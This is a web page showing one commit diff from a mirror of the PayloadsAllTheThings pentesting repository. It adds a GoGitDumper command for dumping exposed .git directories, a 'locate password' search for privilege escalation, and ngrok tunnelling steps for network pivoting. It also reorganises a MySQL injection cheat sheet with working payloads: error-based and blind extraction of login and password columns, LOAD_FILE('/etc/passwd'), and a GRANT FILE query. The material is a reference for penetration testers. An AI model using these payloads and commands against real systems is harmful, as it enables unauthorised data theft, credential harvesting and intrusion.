ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

GoGitDumper + MySQL summary rewrite

Browse Source
This commit is contained in:
Swissky 2019-04-15 00:49:56 +02:00
parent b4633bbb66
commit 13864bde04
4 changed files with 71 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Insecure Source Code Management/README.md
View File

@ -3,6 +3,7 @@
- [GIT - Source code management](#git---source-code-management) - [GIT - Source code management](#git---source-code-management)
- [Github example with a .git](#github-example-with-a-git) - [Github example with a .git](#github-example-with-a-git)
- [Automatic way : diggit.py](#automatic-way--diggitpy) - [Automatic way : diggit.py](#automatic-way--diggitpy)
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
- [Automatic way : rip-git](#automatic-way--rip-git) - [Automatic way : rip-git](#automatic-way--rip-git)
- [Automatic way : GitHack](#automatic-way--githack) - [Automatic way : GitHack](#automatic-way--githack)
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog) - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
-o is a hash of particular Git object to download -o is a hash of particular Git object to download
``` ```
### Automatic way : GoGitDumper
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
git log
git checkout
```
### Automatic way : rip-git ### Automatic way : rip-git
```powershell ```powershell

13
Methodology and Resources/Linux - Privilege Escalation.md
View File

@ -17,6 +17,7 @@
* [Files containing passwords](#files-containing-passwords) * [Files containing passwords](#files-containing-passwords)
* [Last edited files](#last-edited-files) * [Last edited files](#last-edited-files)
* [In memory passwords](#in-memory-passwords) * [In memory passwords](#in-memory-passwords)
* [Find sensitive files](#find-sensitive-files)
* [Scheduled tasks](#scheduled-tasks) * [Scheduled tasks](#scheduled-tasks)
* [Cron jobs](#cron-jobs) * [Cron jobs](#cron-jobs)
* [Systemd timers](#systemd-timers) * [Systemd timers](#systemd-timers)
@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
strings /dev/mem -n10 | grep -i PASS strings /dev/mem -n10 | grep -i PASS
``` ```
### Find sensitive files
```powershell
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
...
```
## Scheduled tasks ## Scheduled tasks
### Cron jobs ### Cron jobs

16
Methodology and Resources/Network Pivoting Techniques.md
View File

@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
``` ```
## ngrok
```powershell
# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433
```
## Basic Pivoting Types ## Basic Pivoting Types
| Type | Use Case | | Type | Use Case |

31
SQL Injection/MySQL Injection.md
View File

@ -8,9 +8,11 @@
* [Extract database with information_schema](#extract-database-with-information-schema) * [Extract database with information_schema](#extract-database-with-information-schema)
* [Extract data without information_schema](#extract-data-without-information-schema) * [Extract data without information_schema](#extract-data-without-information-schema)
* [Extract data without columns name](#extract-data-without-columns-name) * [Extract data without columns name](#extract-data-without-columns-name)
* [MYSQL Error Based](#mysql-error-based)
* [MYSQL Error Based - Basic](#mysql-error-based---basic) * [MYSQL Error Based - Basic](#mysql-error-based---basic)
* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function) * [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function) * [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
* [MYSQL Blind](#mysql-blind)
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
``` ```
## MYSQL Error Based - Basic
## MYSQL Error Based
### MYSQL Error Based - Basic
Works with `MySQL >= 4.1` Works with `MySQL >= 4.1`
@ -117,7 +124,7 @@ Works with `MySQL >= 4.1`
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
``` ```
## MYSQL Error Based - UpdateXML function ### MYSQL Error Based - UpdateXML function
```sql ```sql
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
@ -134,7 +141,7 @@ Shorter to read:
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
``` ```
## MYSQL Error Based - Extractvalue function ### MYSQL Error Based - Extractvalue function
Works with `MySQL >= 5.1` Works with `MySQL >= 5.1`
@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
``` ```
## MYSQL Blind with substring equivalent ## MYSQL Blind
### MYSQL Blind with substring equivalent
```sql ```sql
?id=1 and substring(version(),1,1)=5 ?id=1 and substring(version(),1,1)=5
@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
?id=1 and (select mid(version(),1,1)=4) ?id=1 and (select mid(version(),1,1)=4)
``` ```
## MYSQL Blind using a conditional statement ### MYSQL Blind using a conditional statement
TRUE: `if @@version starts with a 5`: TRUE: `if @@version starts with a 5`:
@ -174,7 +183,7 @@ Response:
HTTP/1.1 200 OK HTTP/1.1 200 OK
``` ```
## MYSQL Blind with MAKE_SET ### MYSQL Blind with MAKE_SET
```sql ```sql
AND MAKE_SET(YOLO<(SELECT(length(version()))),1) AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1) AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
``` ```
## MYSQL Blind with LIKE ### MYSQL Blind with LIKE
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing ['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
@ -221,6 +230,12 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
``` ```
If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
```sql
GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
```
## MYSQL Write a shell ## MYSQL Write a shell
```sql ```sql
@ -265,3 +280,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/) - [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) - [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)